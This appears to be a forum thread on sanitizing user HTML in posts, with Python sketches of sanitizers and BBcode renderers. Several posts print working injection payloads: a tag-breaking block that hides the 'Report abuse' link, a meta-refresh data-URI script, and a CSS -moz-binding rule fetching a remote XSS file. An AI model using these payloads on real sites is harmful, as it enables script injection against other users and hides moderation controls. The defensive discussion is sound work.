Reinventing XML



  • That's it for this page, commence more breaking! :)



  • I've discovered the perfect way to hide the Report abuse link:

    </div></div></td></tr></table></td></tr><tr valign="bottom"><td class="ForumPostFooterArea"><ul class="ForumPostStatistics CommonPrintHidden" style='clear: both;'> <li><li><li><a href='http://www.example.com'>Report abuse</a> <li><a href='http://www.example.com'>Quick Reply</a></ul></td></tr></table><table style="display:none"><tr><td><table><tr><td><div><div>(deformed post content, can be blank)

    This is a deformed post with my real Report abuse/Quick Reply links attached to it. For a real "exploit" it would be hidden with display:none rather than highlighted in yellow.
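    Here is a minimal sketch of why this works and how a forum could catch it, using Python's standard html.parser. The helper names and the short void-tag list are illustrative assumptions, not anything this forum actually runs. The payload closes tags it never opened, which ends the post's own container. It also leaves tags open at the end, so the forum's real footer gets swallowed into the hidden table.

```python
from html.parser import HTMLParser

# Illustrative subset of HTML void elements (they never get a closing tag).
VOID_TAGS = {"br", "hr", "img", "input", "meta", "link"}


class BalanceChecker(HTMLParser):
    """Hypothetical helper: tracks which tags a single post opens and closes."""

    def __init__(self):
        super().__init__()
        self.stack = []               # tags opened by the post, not yet closed
        self.closed_foreign = False   # True once the post closes a tag it never opened

    def handle_starttag(self, tag, attrs):
        if tag not in VOID_TAGS:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if tag in self.stack:
            # Pop up to and including the matching open tag.
            while self.stack.pop() != tag:
                pass
        elif tag not in VOID_TAGS:
            # e.g. </div></td>: this would close the forum's own layout.
            self.closed_foreign = True


def is_unbalanced(fragment: str) -> bool:
    checker = BalanceChecker()
    checker.feed(fragment)
    checker.close()
    # Leftover open tags can swallow whatever page markup follows the post.
    return checker.closed_foreign or bool(checker.stack)
```

    A strict check like this also flags harmless sloppiness such as unclosed <li> tags, so in practice a forum would more likely repair the markup than reject the post.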


  • The next post after it doesn't break.



  • Test

    <edit> Too cool! You're totally elite :)

    (deformed post content, can be blank)


  • @Sunstorm said:

    It does kinda make sense from a whitelist point of view. There are a lot of things to protect against in regular HTML. The other day I discovered you can actually stick JavaScript inside CSS rules in IE. You either have a very paranoid HTML rewriter that strips out or encodes all the tags it doesn't like (see: LiveJournal), or you go with BBcode, which you can secure simply by encoding <, & and >, and then adding in the rest, without fear that some obscure tag will end up used in some strange way for the purpose of sending all your passwords to Korean gangsters.

    The main reason the LiveJournal HTML cleaner is so complex is that (a) it allows CSS (if you block all user-provided CSS, it makes life much easier), (b) it supports a lot of HTML and (c) it tries to close tags properly in order to prevent page-breaking. A simple HTML cleaner for a small subset of HTML shouldn't be significantly harder than BBcode, since it's best to do it the same way - parse it, output clean HTML, encode anything you can't parse. (Of course, I've not actually implemented either, so...)
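    To make "parse it, output clean HTML, encode anything you can't parse" concrete, here is a minimal sketch built on Python's standard html.parser. The ALLOWED_TAGS set is an assumption for illustration. Attributes are dropped wholesale, which sidesteps the user-provided CSS problem entirely, and unclosed tags are closed at the end to prevent page-breaking.

```python
from html import escape
from html.parser import HTMLParser

# Hypothetical whitelist: a few tags, always emitted without attributes.
ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br"}
VOID_TAGS = {"br"}  # allowed tags that never take a closing tag


class WhitelistCleaner(HTMLParser):
    """Re-emits whitelisted tags and escapes everything else as text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []  # whitelisted tags opened but not yet closed

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            # Attributes are dropped wholesale: no style=, onclick=, href=...
            self.out.append(f"<{tag}>")
            if tag not in VOID_TAGS:
                self.open_tags.append(tag)
        else:
            # Unknown tag: show the user's original text instead of obeying it.
            self.out.append(escape(self.get_starttag_text()))

    def handle_startendtag(self, tag, attrs):
        # Self-closing syntax such as <br/>: keep void tags, escape the rest.
        if tag in VOID_TAGS:
            self.out.append(f"<{tag}>")
        else:
            self.out.append(escape(self.get_starttag_text()))

    def handle_endtag(self, tag):
        if tag not in ALLOWED_TAGS:
            self.out.append(escape(f"</{tag}>"))
        elif tag in self.open_tags:
            # Close inner tags first so the output stays properly nested.
            while self.open_tags:
                inner = self.open_tags.pop()
                self.out.append(f"</{inner}>")
                if inner == tag:
                    break
        # An unmatched closing tag (</b> with no <b>) is silently dropped.

    def handle_data(self, data):
        self.out.append(escape(data))

    # Comments, doctypes and processing instructions fall through to the
    # base-class handlers, which ignore them, so they are dropped.


def clean_html(fragment: str) -> str:
    cleaner = WhitelistCleaner()
    cleaner.feed(fragment)
    cleaner.close()
    # Close anything left open so it cannot swallow the rest of the page.
    cleaner.out.extend(f"</{tag}>" for tag in reversed(cleaner.open_tags))
    return "".join(cleaner.out)
```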

    @Carnildo said:

    @Iago said:
    @kirchhoff said:
    The lone exception is Slashdot. This is because they actually know what they're doing and have been around the longest.

    I was about to point out that there are loads of forums that use proper HTML for user comments - PerlMonks, for example, is another that's been around for donkey's years and has a decent comment system.

    Then I noticed that I was having to use real HTML here, in this very post, because that's the only way I can find of putting a line break between paragraphs. Hmm, maybe it's not such a rare feature after all.


    The forum software here is a real WTF. I haven't had the patience to test, but I'm fairly sure it's quite vulnerable to XSS/javascript injection.

    It was last time I checked. Fortunately, they've fixed that particular exploit (fun bug in the HTML parser), though there are probably others.



  • @Random832 said:

    I've discovered the perfect way to hide the Report abuse link:

    </div></div></td></tr></table></td></tr><tr valign="bottom"><td class="ForumPostFooterArea"><ul class="ForumPostStatistics CommonPrintHidden" style='clear: both;'> <li><li><li><a href='http://www.example.com'>Report abuse</a> <li><a href='http://www.example.com'>Quick Reply</a></ul></td></tr></table><table style="display:none"><tr><td><table><tr><td><div><div>(deformed post content, can be blank)

    Please tell me they didn't allow CSS? That's just asking for trouble...



  • OK! I got it. My only concern is the recursivity in my body[...]

    Looking at my own reflection

    When suddenly it changes, violently it changes!

    Aw, there is no turning back now,

    You've woken up the machine...

    in meeee!!!



  • @makomk said:

    @Sunstorm said:
    It does kinda make sense from a whitelist point of view. There are a lot of things to protect against in regular HTML. The other day I discovered you can actually stick JavaScript inside CSS rules in IE. You either have a very paranoid HTML rewriter that strips out or encodes all the tags it doesn't like (see: LiveJournal), or you go with BBcode, which you can secure simply by encoding <, & and >, and then adding in the rest, without fear that some obscure tag will end up used in some strange way for the purpose of sending all your passwords to Korean gangsters.

    The main reason the LiveJournal HTML cleaner is so complex is that (a) it allows CSS (if you block all user-provided CSS, it makes life much easier), (b) it supports a lot of HTML and (c) it tries to close tags properly in order to prevent page-breaking. A simple HTML cleaner for a small subset of HTML shouldn't be significantly harder than BBcode, since it's best to do it the same way - parse it, output clean HTML, encode anything you can't parse. (Of course, I've not actually implemented either, so...).

    Also, BBcode isn't exactly immune from XSS attacks either if improperly implemented (and since a proper implementation is of about the same difficulty as a robust whitelisting HTML cleaner, guess what actually happens).
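    A minimal sketch of the escape-first BBcode approach in Python, with one example of how an implementation goes wrong: encoding <, & and > does nothing against [url=javascript:...], because that payload needs none of those characters. The tag set and the http/https-only rule are assumptions for illustration, not any particular forum's implementation.

```python
import html
import re

# Hypothetical tag set for illustration; real BBcode dialects vary.
SIMPLE_TAGS = {"b": "strong", "i": "em"}
URL_TAG = re.compile(r"\[url=([^\]\s]+)\](.*?)\[/url\]", re.IGNORECASE | re.DOTALL)
SAFE_SCHEMES = ("http://", "https://")


def render_bbcode(text: str) -> str:
    # Step 1: escape &, <, > (and quotes, since URLs end up inside attributes).
    out = html.escape(text, quote=True)

    # Step 2: add back the handful of tags we support.
    for bb, tag in SIMPLE_TAGS.items():
        out = re.sub(rf"\[{bb}\](.*?)\[/{bb}\]", rf"<{tag}>\1</{tag}>", out,
                     flags=re.IGNORECASE | re.DOTALL)

    def link(match):
        url, label = match.group(1), match.group(2)
        # Escaping alone is not enough: "javascript:alert(1)" contains no < or >.
        if not url.lower().startswith(SAFE_SCHEMES):
            return match.group(0)  # leave the (already escaped) text as-is
        return f'<a href="{url}" rel="nofollow">{label}</a>'

    return URL_TAG.sub(link, out)
```

    This sketch does not repair mis-nested input: [b][i]x[/b][/i] comes out as <strong><em>x</strong></em>. Fixing that means parsing the tags into a tree, at which point it is about as much work as a whitelisting HTML cleaner.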



  • XSS injection?

    <meta http-equiv="refresh" content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
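    The base64 blob is where the script hides, so a filter that only searches the post text for <script> never sees it. A quick Python check decodes it. is_safe_link is a hypothetical allowlist helper showing the usual defence of accepting only http and https URLs in user-supplied markup.

```python
import base64
from urllib.parse import urlsplit

# The URL part of the meta refresh's content attribute, from the post above.
PAYLOAD = "data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"

# Everything after the first comma is the base64-encoded document.
_, _, encoded = PAYLOAD.partition(",")
print(base64.b64decode(encoded).decode("ascii"))  # prints <script>alert('XSS')</script>


def is_safe_link(url: str) -> bool:
    """Hypothetical allowlist check: only http(s) links survive."""
    return urlsplit(url.strip()).scheme.lower() in {"http", "https"}
```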


  • <style>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</style>


  • @makomk said:

    @makomk said:
    @Sunstorm said:
    It does kinda make sense from a whitelist point of view. There are a lot of things to protect against in regular HTML. The other day I discovered you can actually stick JavaScript inside CSS rules in IE. You either have a very paranoid HTML rewriter that strips out or encodes all the tags it doesn't like (see: LiveJournal), or you go with BBcode, which you can secure simply by encoding <, & and >, and then adding in the rest, without fear that some obscure tag will end up used in some strange way for the purpose of sending all your passwords to Korean gangsters.

    The main reason the LiveJournal HTML cleaner is so complex is that (a) it allows CSS (if you block all user-provided CSS, it makes life much easier), (b) it supports a lot of HTML and (c) it tries to close tags properly in order to prevent page-breaking. A simple HTML cleaner for a small subset of HTML shouldn't be significantly harder than BBcode, since it's best to do it the same way - parse it, output clean HTML, encode anything you can't parse. (Of course, I've not actually implemented either, so...).

    Also, BBcode isn't exactly immune from XSS attacks either if improperly implemented (and since a proper implementation is of about the same difficulty as a robust whitelisting HTML cleaner, guess what actually happens).


    An old version of phpBB had a bug in the HTML sanitizer where it would let a forbidden tag through if a permitted tag matched the start of the forbidden tag.  Hence, if you'd blacklisted the "script" tag, but permitted the "s" tag, people could still insert JavaScript directly.
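    The bug is easy to reproduce. This is not phpBB's actual code, just a minimal Python illustration of the same mistake: a whitelist check that tests whether the tag text starts with an allowed name, next to a fix that extracts the full tag name before comparing. The ALLOWED set is hypothetical.

```python
import re

ALLOWED = {"b", "i", "s"}  # hypothetical whitelist that includes the short "s" tag
TAG_NAME = re.compile(r"</?([a-zA-Z][a-zA-Z0-9]*)")


def buggy_is_allowed(tag_text: str) -> bool:
    # BUG: prefix match, so "<script>" passes because it starts with "<s".
    text = tag_text.lower()
    return any(text.startswith(("<" + name, "</" + name)) for name in ALLOWED)


def fixed_is_allowed(tag_text: str) -> bool:
    # Extract the complete tag name, then require an exact match.
    match = TAG_NAME.match(tag_text)
    return match is not None and match.group(1).lower() in ALLOWED
```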



  • @svennieboy said:

    Can you elaborate on this and/or give some pointers? It sounds interesting, but I don't know what CSS construct you are referring to...

    Thanks!

    Sven

    Say you take all the comments and put them in a div with class 'comments'. Each comment is a div or table cell or some such with class 'comment_body', perhaps. Then you want styles that apply only to the allowed HTML in comments.

    Then you have a CSS definition that looks something like this: 

    div.comments { color: #403030; font-family: "new century schoolbook", serif }
    div.comments div.comment_body em { font-style: italic; }
    div.comments div.comment_body strong {font-weight: bold; color: #804040; }

    Which would be applied to this output:

    <div class="comments">
      <!-- Some comment header stuff -->
      <div class="comment_body">
        My post appears here. <em>This is in italics</em> <strong>This is bold AND brighter red than the rest of the comment text</strong>
      </div>
    </div>

    The idea is that you could allow simple HTML constructs like <em> and <strong> and nothing more (no attributes or weird nesting), and still be able to style them without "interpreting" the text during display, just substituting it between the div tags when producing output.
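    A minimal Python sketch of that output step, assuming the only markup allowed is bare <em> and <strong>. Everything is HTML-escaped first, then only the exact escaped tokens for those two tags are turned back into real tags. Stray or mis-nested closing tags stay as text, and unclosed ones are closed at the end. The function names are hypothetical; the class names follow the CSS above.

```python
import html
import re

# Hypothetical: the only markup allowed in comment bodies, with no attributes.
ALLOWED = ("em", "strong")
# Matches exactly "&lt;em&gt;", "&lt;/em&gt;", etc. after escaping.
TOKEN = re.compile(r"&lt;(/?)(" + "|".join(ALLOWED) + r")&gt;")


def render_comment_body(text: str) -> str:
    escaped = html.escape(text, quote=True)
    out, stack, pos = [], [], 0
    for m in TOKEN.finditer(escaped):
        out.append(escaped[pos:m.start()])
        closing, name = m.group(1) == "/", m.group(2)
        if not closing:
            stack.append(name)
            out.append(f"<{name}>")
        elif stack and stack[-1] == name:
            stack.pop()
            out.append(f"</{name}>")
        else:
            out.append(m.group(0))  # stray or mis-nested close: keep as text
        pos = m.end()
    out.append(escaped[pos:])
    # Close leftovers so the comment can't leak styling into the page.
    out.extend(f"</{name}>" for name in reversed(stack))
    return "".join(out)


def render_comments(bodies: list[str]) -> str:
    parts = ['<div class="comments">']
    for body in bodies:
        parts.append(f'  <div class="comment_body">{render_comment_body(body)}</div>')
    parts.append("</div>")
    return "\n".join(parts)
```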



  • Test

